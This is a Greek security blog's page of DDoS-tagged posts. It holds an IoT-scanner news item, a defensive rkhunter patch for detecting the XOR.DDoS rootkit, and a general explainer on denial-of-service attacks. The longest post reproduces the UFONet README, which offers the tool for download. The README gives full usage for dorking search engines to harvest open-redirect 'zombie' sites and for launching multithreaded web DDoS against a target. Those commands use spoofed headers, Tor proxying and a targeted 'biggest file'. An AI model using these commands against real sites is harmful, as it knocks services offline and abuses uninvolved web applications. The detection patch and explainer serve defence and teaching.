Kατεβάσετε την εφαρμογή android του blog! DownLoad

FoulsCode: 2011-17

Translate

Πρόσφατα Σχόλια

Σύνολο αναρτήσεων

Εμφάνιση αναρτήσεων με ετικέτα DDoS. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα DDoS. Εμφάνιση όλων των αναρτήσεων

Σαρωτής IoT δείχνει αν η συσκευή σας είναι ευάλωτη σε επιθέσεις DDoS

Written By Greek Port on Δευτέρα, 22 Μαΐου 2017 | Μαΐου 22, 2017





Αν θυμάστε την επίθεση DDoS 1 Tbps στη γαλλική εταιρεία φιλοξενίας OVH, ίσως να θυμάστε ότι έγινε μέσω του botnet Mirai, χάρη στις 145000 IoT συσκευές.Αλλά πώς θα νιώθετε αν κάποιος σας έλεγε ότι υπάρχουν εκατομμύρια συσκευών που συνδέονται στο Διαδίκτυο (IoT) ευάλωτες σε hacking που μπορούν να χρησιμοποιηθούν για επιθέσεις στον κυβερνοχώρο;

Ναι, σύμφωνα με το BullGuard θα μπορούσαν να υπάρχουν πάνω από 185 εκατομμύρια συνδεδεμένες συσκευές στο διαδίκτυο που είναι απροστάτευτες και ευάλωτες στις επιθέσεις χάκερ.
Οι αριθμοί αυτοί συλλέχθηκαν με βάση τα αποτελέσματα σάρωσης μέσω του BullGuard’s Internet of Things Scanner που επιτρέπει στους χρήστες να πάνε για μια μοναδική σάρωση και να δουν αν οι οικιακές τους συσκευές είναι ευάλωτες στο Shodan.

Εάν οι συσκευές βρίσκονται στο Shodan, αυτό σημαίνει ότι είναι διαθέσιμες σε δημόσια πρόσβαση.


Το Shodan είναι μια μηχανή αναζήτησης που επιτρέπει στον χρήστη να βρει συγκεκριμένους τύπους υπολογιστών συνδεδεμένους στο Internet χρησιμοποιώντας διάφορα φίλτρα.

BullGuard Internet of Things Scanner

via: secnews.gr
Μαΐου 22, 2017 | 0 σχόλια | Διαβάστε περισσότερα

#44 Patch for the Linux/XOR.DDoS rootkit

Written By Greek Port on Τρίτη, 7 Φεβρουαρίου 2017 | Φεβρουαρίου 07, 2017




Hello all,



I have created a patch to identify the XOR.DDoS rootkit that is used on botnets to take down sites with massive DDoS attacks.

https://en.wikipedia.org/wiki/Rootkit
https://en.wikipedia.org/wiki/Xor_DDoS

It will patch two files:

1 - backdoorports.dat

Creates an entry on the backdoorports.dat file that reports the port 3205 as a possible presence of the threat, that connect to the botnet's CC.

2 - rkhunter

It creates a list with the main files used by the rootkit to the do_system_check_initialization function and register the test on the rootkit_file_dir_checks.

There is also a XOR key and some other hardcoded strings that would help to identify other files with random names, however, I could not figure out where/how the string based test really is on rkhunter, so decided to provide these initial tests and improve the detection later as some detection is better than none.

The detection is based on the reports made by:

Malware Must Die

http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html

Akamai

https://www.stateoftheinternet.com/resources-web-security-threat-advisories-2015-xor-ddos-attacks-linux-botnet-malware-removal-ddos-mitigation-yara-snort.html

Avast

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

I have tested the patch and it worked well, you can see on the following images





1 Attachments

rkhunter.patch

Discussion
Φεβρουαρίου 07, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Mεγάλες επίθεσης ddos 2016 August

Written By Greek Port on Πέμπτη, 24 Νοεμβρίου 2016 | Νοεμβρίου 24, 2016



Νοεμβρίου 24, 2016 | 0 σχόλια | Διαβάστε περισσότερα

Denial Of Service (D.O.S.) Επιθέσεις

Written By Greek Port on Τετάρτη, 3 Αυγούστου 2016 | Αυγούστου 03, 2016





- Από τον Vampyre

Οι D.O.S. επιθέσεις ή Denial Of Service Επιθέσεις που στα Ελληνικά μεταφράζονται περίπου ως Επίθεση Άρνησης Παροχής Υπηρεσιώνέχουν γίνει κάτι πολύ απλό και καθημερινό στους hackers* και crackers σαν ένα μέσο προς την δόξα και την αναγνώριση σε πολλές ανορθόδοξες (underground) ομάδες στο Internet. Denial Of Service Επίθεση βασικά σημαίνει την διακοπή (άρνηση) της χρήσης του Internet ή/και του δικτύου στους νόμιμους χρήστες του. Αυτό γίνεται δυνατό με μια ηλεκτρονική "επίθεση" (attack) στους παροχείς Internet ή/και στα Websites με αποτέλεσμα την "κατάρρευση" (crash) του συστήματος και την απενεργοποίησή του.

Με άλλα λόγια θα μπορούσε κάποιος να περιγράψει μια Denial Of Service Επίθεση, λέγοντας ότι μια τέτοια επίθεση έχει ως σκοπό να υπερφορτώσει τόσο πολύ το σύστημα-στόχο καταναλώνοντας μνήμη και bandwidth έτσι ώστε να μην είναι σε θέση πλέον να εξυπηρετήσει τους κανονικούς χρήστες του. Αυτό επιτυγχάνεται μέσω της αποστολής πακέτων δεδομένων (data packets) σε υπερβολικά μεγάλο ρυθμό έτσι ώστε το σύστημα-στόχος να αδυνατεί να τα επεξεργαστεί με αποτέλεσμα τις περισσότερες φορές να πρέπει να γίνει επανεκκίνηση (reboot).

Οι πιο συνηθισμένοι τύποι Denial Of Service Επιθέσεων είναι :
Οι επιθέσεις που εκμεταλλεύονται αδυναμίες του πρωτοκόλλου TCP/IP
Οι επιθέσεις που εκμεταλλεύονται αδυναμίες του IPv4
Οι επιθέσεις που προσπαθούν να εξαντλήσουν όλους τους πόρους (resources) - μνήμη, CPU, Bandwidth - του συστήματος στόχου με αποτέλεσμα την διακοπή της λειτουργίας του.

Ας δούμε μερικές D.O.S. επιθέσεις που σχετίζονται με το πρωτόκολλο TCP/IP. Οι πιο γνωστές είναι οι Ping of Death, Teardrop, SYN Attack, Land Attack και Smurf Attack.


Ping of Death: Αυτή η επίθεση είναι πολύ γνωστή και χρησιμοποιούταν παλαιότερα για να κάνει απομακρυσμένα συστήματα να "παγώνουν" (hang) ή ακόμα και να κάνουν αυτόματη επανεκκίνηση (reboot), έτσι ώστε οι χρήστες να μην μπορούν να τα χρησιμοποιήσουν. Αυτό πλέον δεν είναι εφικτό μια και στις μέρες μας σχεδόν όλοι οι Διαχειριστές των Συστημάτων (Systems Administrators) έχουν αναβαθμίσει τα συστήματά τους κάνοντάς τα ασφαλή από τέτοιες επιθέσεις.

Ο τρόπος για να γίνει αυτή η επίθεση είναι να στείλει κάποιος ένα πακέτο data (data packet) που υπερβαίνει το μέγιστο επιτρεπόμενο όριο bytes του πρωτοκόλλου TCP/IP, που είναι 65536. Στέλνοντας ένα πακέτο data (data packet) μεγαλύτερο από αυτό, αμέσως το σύστημα-στόχος πάθαινε κατάρρευση (crash) ή/και "πάγωνε" (hang) ή/και έκανε επανεκκίνηση (reboot). Το Ping Of Death έγινε πολύ δημοφιλές λόγω της ευκολίας στην υλοποίηση του. Επίσης αυτού του τύπου η επίθεση ήταν και είναι ακόμα πολύ δημοφιλής στο IRC (Internet Relay Chat).

Teardrop: Αυτή η επίθεση εκμεταλλεύεται την αδυναμία του πρωτοκόλλου TCP/IP στην επανασύνδεση (reassembly) των πακέτων δεδομένων (data packets) κατά την λήψη τους. Όταν στέλνονται data στο Internet αυτά κατανέμονται σε μικρότερα κομμάτια στην υπολογιστή που κάνει την μετάδοση και συναρμολογούνται πάλι στον υπολογιστή που λαμβάνει. Ας υποθέσουμε ότι θέλουμε να στείλουμε 8000 bytes από έναν υπολογιστή σε έναν άλλον. Δεν θα τα στείλουμε όλα μαζί με μία μετάδοση (transmission) αλλά θα κοπούν σε μικρότερα πακέτα data (data packets) και κάθε πακέτο θα έχει συγκεκριμένο κομμάτι από τα 8000 bytes όπως : πακέτο 1ο θα έχει byte 1 έως byte 1500, πακέτο 2ο θα έχει byte 1501 έως byte 3000, πακέτο 3ο θα έχει byte 3001 έως byte 4000 κ.λ.π.

Αυτά τα πακέτα έχουν στο αρχικό τους κομμάτι (TCP header) ένα πεδίο (offset) που περιγράφει πως θα γίνει η συναρμολόγηση στο σύστημα που θα λάβει τα πακέτα. Στην επίθεση αυτή τα πακέτα που στέλνονται υπερκαλύπτουν το ένα το άλλο με αποτέλεσμα όταν το σύστημα που τα λαμβάνει προσπαθεί να τα συναρμολογήσει (reassembly) παθαίνει κατάρρευση (crash) ή/και "πάγωμα" (hang) ή/και επανεκκίνηση (reboot).

SYN Attack / Land Attack: Αυτές οι δύο επιθέσεις είναι ίδιες με τη διαφορά ότι η SYN attack χρησιμοποιεί ανύπαρκτες διευθύνσεις IP για να αναγκάσει το σύστημα στόχο να περιμένει για πάντα για μια απάντηση από ανύπαρκτη IP διεύθυνση ενώ η Land Attack αντί για ανύπαρκτες IP διευθύνσεις χρησιμοποιεί την IP του συστήματος-στόχου και αυτό έχει ως αποτέλεσμα μια ατελείωτη σειρά (endless loop) επεξεργασίας για το σύστημα. Και οι δύο επιθέσεις έχουν ως αποτέλεσμα, όταν γίνονται μαζικά, κατάρρευση (crash) ή/και "πάγωμα" (hang) ή/και επανεκκίνηση (reboot).

Smurf Attack : Η Smurf attack είναι μια επίθεση όπου στέλνεται ένας υπέρογκος αριθμός από ping requests συνήθως στον router του δικτύου, χρησιμοποιώντας ψεύτικες (spoofed) IP διευθύνσεις μέσα από το ίδιο το δίκτυο. Κάθε φορά που ο router δέχεται ένα Ping request θα το διανείμει (route it) ή θα απαντήσει σε αυτό (echo back), με αποτέλεσμα την υπερφόρτωση (flood) του δικτύου με πακέτα και την διακοπή της λειτουργίας του.

Οι D.O.S. επιθέσεις δεν είναι τίποτα καινούριο στο Internet. Στην πραγματικότητα υπάρχουν και είναι γνωστές εδώ και αρκετά χρόνια. Τον τελευταίο καιρό όμως έχει γίνει ένας μεγάλος αριθμός από D.O.S. επιθέσεις και έχουν καταλήξει να θεωρούνται πιο επιβλαβείς από τις χιλιάδες ιών (viruses)/trojans που κυκλοφορούν στο Internet. Είναι εύκολο να κατανοήσει κανείς ότι στις περιπτώσεις επιθέσεων που περιγράφηκαν πιο πάνω είναι σχετικά εύκολο να βρεθεί ο επιτιθέμενος και να συλληφθεί. Αυτό δεν συμβαίνει όμως στις D.D.O.S. (Κατανεμημένες D.O.S. Επιθέσεις - Distributed D.O.S. Attacks) επιθέσεις οι οποίες έχουν γίνει ιδιαίτερα γνωστές τον τελευταίο χρόνο.


Ας υποθέσουμε ότι μια ομάδα hackers* θέλει να επιτεθεί σε ένα από τα μεγάλα websites (π.χ. yahoo.com, amazon.com, ebay.com κ.λ.π.). Ας υποθέσουμε ότι η ομάδα αποτελείται από 4 άτομα. Κάθε ένας/μία επιτίθεται σε ένα μικρότερο δίκτυο - το οποίο δεν έχει σχέση με τη σελίδα που θέλουν να «χτυπήσουν» - καταλαμβάνοντάς το πλήρως (complete takeover). Κάθε μικρότερο δίκτυο ας υποθέσουμε ότι αποτελείται από 30+ υπολογιστές. Τώρα λοιπόν οι hackers* κάθονται αναπαυτικά ο καθένας στον υπολογιστή του σπιτιού του και χρησιμοποιούν τους ξένους υπολογιστές για να κάνουν την επίθεση, αφού πρώτα έχουν εγκαταστήσει κάποιο εργαλείο D.O.S. attack σε αυτούς. Το αποτέλεσμα είναι 120+ υπολογιστές να κάνουν επίθεση στο συγκεκριμένο site, καταναλώνοντας bandwidth, μνήμη, και CPU. Το τι θα συμβεί εξαρτάται από το σύστημα στόχο. Μπορεί να παρατηρηθεί αργή απόκριση (lag) μέχρι και ολική κατάρρευση (crash). Οι hackers* έχοντας απόλυτο έλεγχο στα μικρότερα δίκτυα σβήνουν κάθε στοιχείο της επέμβασής τους με αποτέλεσμα να είναι αδύνατος ο εντοπισμός τους τις περισσότερες φορές.

Παράδειγμα Κατανεμημένης D.O.S. Επίθέσης - Distributed D.O.S. Attack :

(να σημειωθεί ότι το παράδειγμα είναι αληθινό και μπορείτε να διαβάσετε εδώ λεπτομερή περιγραφή του)

Το παράδειγμα αυτό μπορεί να αποδείξει ότι στις μέρες μας κανείς δεν μπορεί πλέον να νοιώθει ασφαλής και ότι είναι πολύ εύκολο ακόμα και ένα παιδί (script kiddie) να εκτελέσει μια D.D.O.S. attack.


Σύστημα στόχος: grc.com

Ομάδα επίθεσης αποτελούμενη από: 1 άτομο

Μέσα εκτέλεσης D.D.O.S.: Προσωπικοί υπολογιστές με εγκατεστημένα trojans που ελήφθησαν με e-mail ή άλλο τρόπο συνδεδεμένοι σε υψηλής ταχύτητας Internet connections (cable modems, ADSL, ISDN)

Αριθμός Bots*: 474+

Τρόπος επίθεσης: 2.399.237.016 (!!!) Invalid UDP πακέτα

Τρόπος εκτέλεσης: Σε κάθε έναν από αυτούς του προσωπικούς υπολογιστές είχε εγκατασταθεί ένα πρόγραμμα trojan με το όνομα rundIl.exe (rundii.exe) αντί για runDLL.exe το οποίο λόγω των κακών γραμματοσειρών των Windows δεν γινόταν ορατό στον χρήστη εύκολα. Αυτό το προγραμματάκι ήταν ένα script που συνδεόταν κρυφά σε έναν IRC server και αρχικά συμπεριφερόταν σαν IRC bot**. Μετά "κατέβαζε" από το Internet ένα κομμάτι του Sub7 trojan δίνοντας απόλυτο έλεγχο στον προσωπικό υπολογιστή του χρήστη. Για να εκτελεστούν οι D.D.O.S. επιθέσεις αρκούσε το αρχικό script αλλά το Sub7 έδινε την δυνατότητα στον hacker* να μπορεί να δει και όλα τα αρχεία του ηλεκτρονικού υπολογιστή του χρήστη καθώς επίσης και να κλέψει όλα τα passwords ή οτιδήποτε άλλο του ήταν χρήσιμο.


Κάθε χρήστης αυτών των υπολογιστών αμέσως μόλις συνδεόταν στο Internet ο υπολογιστής του κρυφά συνδεόταν σε έναν IRC server και έμπαινε σε ένα κρυφό IRC channel όπου περίμενε εντολές. Μετά αρκούσε ο hacker* να δώσει μια εντολή του τύπου !p4 IP_συστήματος_στόχου και αμέσως το rundIl.exe σε κάθε υπολογιστή άρχιζε να εκτελεί εντολές του τύπου Ping Of Death αλλά με τη διαφορά ότι το μέγεθος του πακέτου ήταν 65500 ενώ η ποσότητα του ήταν 10,000 ping requests. Σε συνδυασμό με την εντολή !udp IP_συστήματος_στόχου με την οποία στέλνονταν 1 εκατομμύριο invalid UDP πακέτα με μηδενική αναμονή (delay) μεταξύ τους, έφταναν για να απορροφήσουν όλο το bandwidth του συστήματος και να του κόψουν τη σύνδεση από το Internet.

Ήταν αδύνατον να βρεθεί ποιος έκανε αυτού του τύπου την επίθεση γιατί ο hacker* χρησιμοποιούσε υπολογιστές απλών ανθρώπων που συνδέονταν στο Internet και ήταν αρκετά αφελείς για να δέχονται οποιοδήποτε αρχείο που τους αποστελλόταν χωρίς έλεγχο και δεν χρησιμοποιούσαν ένα καλό firewall*** για προστασία.

Κανένα σύστημα συνδεδεμένο στο Internet δεν είναι ασφαλές από D.D.O.S. επίθεση. Όλα τα λειτουργικά μπορούν και να προσβληθούν και να χρησιμοποιηθούν για τέτοιες επιθέσεις : Unix, Linux, Windows9x, NT, 2K ακόμα και Apple MacOS. Κανένας χρήστης του Internet δεν είναι ασφαλής αν δεν χρησιμοποιεί έναν καλό συνδυασμό προγράμματος προστασίας ενάντια στους ιούς (antivirus) και ένα καλό firewall.

Vampyre
Αυγούστου 03, 2016 | 0 σχόλια | Διαβάστε περισσότερα

UFONet - DDoS Botnet via Web Abuse

Written By Greek Port on Τετάρτη, 6 Ιουλίου 2016 | Ιουλίου 06, 2016

====================================================================== UFONet - DDoS Botnet via Web Abuse ======================================================================

Project info: UFONet - is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet. + See this links for more info: - CWE-601:Open Redirect - OWASP:URL Redirector Abuse UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.
[!]Remember: this tool is NOT for educational purpose. Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Download: Current version: v0.6 - Galactic Offensive!
git clone https://github.com/epsylon/ufonet + Packages: - UFONet-v0.6(.zip) (md5:d834d43d20197ff13cb73c5710b82e03) - torrent - UFONet-v0.6(.tar.gz) (md5:c46b906f40821dd07b6c83af62a05613) - torrent -------------------------------- + Previous: - UFONet-v0.5b(.tar.gz) (md5:775f13baefb9241142c377f8519506f7)

Installing: UFONet runs on many platforms. It requires Python (2.x.y) and the following libraries: python-pycurl - Python bindings to libcurl python-geoip - Python bindings for the GeoIP IP-to-country resolver library On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl python-geoip Source libs: * Python | * PyCurl | * PyGeoIP

Usage:Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose active verbose on requests --update check for latest stable version --check-tor check to see if Tor is used properly --force-yes set 'YES' to all questions --disableisup disable external check of target's status --gui run GUI (UFONet Web Interface) *Configure Request(s)*: --proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118') --user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED) --referer=REFERER Use another HTTP Referer header (default SPOOFED) --host=HOST Use another HTTP Host header (default NONE) --xforw Set your HTTP X-Forwarded-For with random IP values --xclient Set your HTTP X-Client-IP with random IP values --timeout=TIMEOUT Select your timeout (default 10) --retries=RETRIES Retries when the connection timeouts (default 1) --threads=THREADS Maximum number of concurrent HTTP requests (default 5) --delay=DELAY Delay in seconds between each HTTP request (default 0) *Search for 'Zombies'*: -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=') --sd=DORKS Search from a list of 'dorks' (ex: --sd 'dorks.txt') --sn=NUM_RESULTS Set max number of results for engine (default 10) --se=ENGINE Search engine to use for 'dorking' (default: duck) --sa Search massively using all search engines *Test Botnet*: -t TEST Update 'zombies' status (ex: -t 'zombies.txt') --attack-me Order 'zombies' to attack you (NAT required!) *Community*: --download-zombies Download 'zombies' from Community server: Turina --upload-zombies Upload your 'zombies' to Community server: Turina --blackhole Create a 'blackhole' to share your 'zombies' --up-to=UPIP Upload your 'zombies' to a 'blackhole' --down-from=DIP Download your 'zombies' from a 'blackhole' *Research Target*: -i INSPECT Search for biggest file (ex: -i 'http://target.com') *Configure Attack(s)*: --disable-aliens Disable 'aliens' web abuse of test services --disable-isup Disable check status 'is target up?' -r ROUNDS Set number of rounds (default: 1) -b PLACE Set place to attack (ex: -b '/path/big.jpg') -a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')

Searching for 'zombies': UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites. A common query string should be like this: 'proxy.php?url=' 'check.cgi?url=' 'checklink?uri=' 'validator?uri=' For example you can begin a search with: ./ufonet -s 'proxy.php?url=' Or providing a list of "dorks" from a file: ./ufonet --sd 'dorks.txt' By default UFONet will uses a search engine called 'duck'. But you can choose a different one: ./ufonet -s 'proxy.php?url=' --se 'bing' This is the list of available search engines with last time that were working: - duck [07/10/2015: OK!] - google [07/10/2015: OK!] - bing [07/10/2015: OK!] - yahoo [07/10/2015: OK!] - yandex [07/10/2015: OK!] You can also search massively using all search engines supported: ./ufonet -s 'proxy.php?url=' --sa To control how many 'zombies' recieve from search engines you can use: ./ufonet --sd 'dorks.txt' --sa --sn 20 At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable. Wanna check if they are valid zombies? (Y/n) Also, you will be asked to update the list adding automatically only 'vulnerable' web apps. Wanna update your list (Y/n) If you reply 'Y' your new 'zombies' will be appended to the file named: zombies.txt ------------- Examples: + with verbose: ./ufonet -s 'proxy.php?url=' -v + with threads: ./ufonet --sd 'dorks.txt' --sa --threads 100

Testing botnet: Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. Urls of the 'zombies' should be like this: http://target.com/check?uri= After that, launch it: ./ufonet -t zombies.txt You can order to 'zombies' to attack you and see how they reply to your needs using: ./ufonet --attack-me At the end of the process you will be asked if you want to update the list adding automatically only 'vulnerable' web apps. Wanna update your list (Y/n) If you reply 'Y', your file: zombies.txt will be updated. ------------- Examples: + with verbose: ./ufonet -t zombies.txt -v + with proxy TOR: ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118" + with threads: ./ufonet -t zombies.txt --threads 50

Inspecting a target: This feature will provides you the biggest file on target: ./ufonet -i http://target.com You can use this when attacking to be more effective: ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx" ------------- Example: +input: ./ufonet -i http://target.com +output: [...] +Image found: images/wizard.jpg (Size: 63798 Bytes) ------------ +Style (.css) found: fonts.css (Size: 20448 Bytes) ------------ +Webpage (.php) found: contact.php (Size: 2483 Bytes) ------------ +Webpage (.php) found: about.php (Size: 1945 Bytes) ------------ +Webpage (.php) found: license.php (Size: 1996 Bytes) ------------ ================================================================================ =Biggest File: http://target.com/images/wizard.jpg ================================================================================

Attacking a target: Enter a target to attack with a number of rounds: ./ufonet -a http://target.com -r 10 On this example UFONet will attacks the target a number of 10 times for each 'zombie'. That means that if you have a list of 1.000 'zombies' it will launchs 1.000 'zombies' x 10 rounds = 10.000 requests to the target. By default if you don't put any round it will apply only 1. Additionally, you can choose a place to recharge on target's site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn't use cache systems this will do the attack more effective. ./ufonet -a http://target.com -b "/images/big_size_image.jpg" ------------- Examples: + with verbose: ./ufonet -a http://target.com -r 10 -v + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118" + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg" + with threads: ./ufonet -a http://target.com -r 10 --threads 500

Updating: UFONet implements an option to update the tool to the latest stable version. This feature can be used only if you have cloned it from GitHub repository To check your version you should launch: ./ufonet --update This will update the tool automatically, removing all files from your old package.

GUI/Web Interface: You can manage UFONet using a Web interface. The tool has implemented a python web server connected to the core, to provides you a more user friendly experience. To launch it, use: ./ufonet --gui This will open a tab on your default browser with all features of the tool and some 'extra' options.

Generating 'Blackhole': UFONet has some P2P options to share/keep 'zombies' with other 'motherships'. * Setup web server with a folder "ufonet", this folder should be: - located in /var/www/ufonet (default debian/ubuntu install) - owned by the user running the blackhole - accessible with http://your-ip/ufonet/ * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py) * Anyone wanting to connect to your server needs to set the --up-to/--down-from to the ip address of your webserver... [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to. ------------- Examples: + Starting 'blackhole' server: ./ufonet --blackhole

Contribute: If you want to contribute to UFONet development, reporting a bug, providing a patch, commenting on the code base or simply need to find help to run it, please go to: + Wormhole: irc.freenode.net / channel: #ufonet If nobody gets back to you, then drop me an e-mail.
Ιουλίου 06, 2016 | 0 σχόλια | Διαβάστε περισσότερα
 
berita unik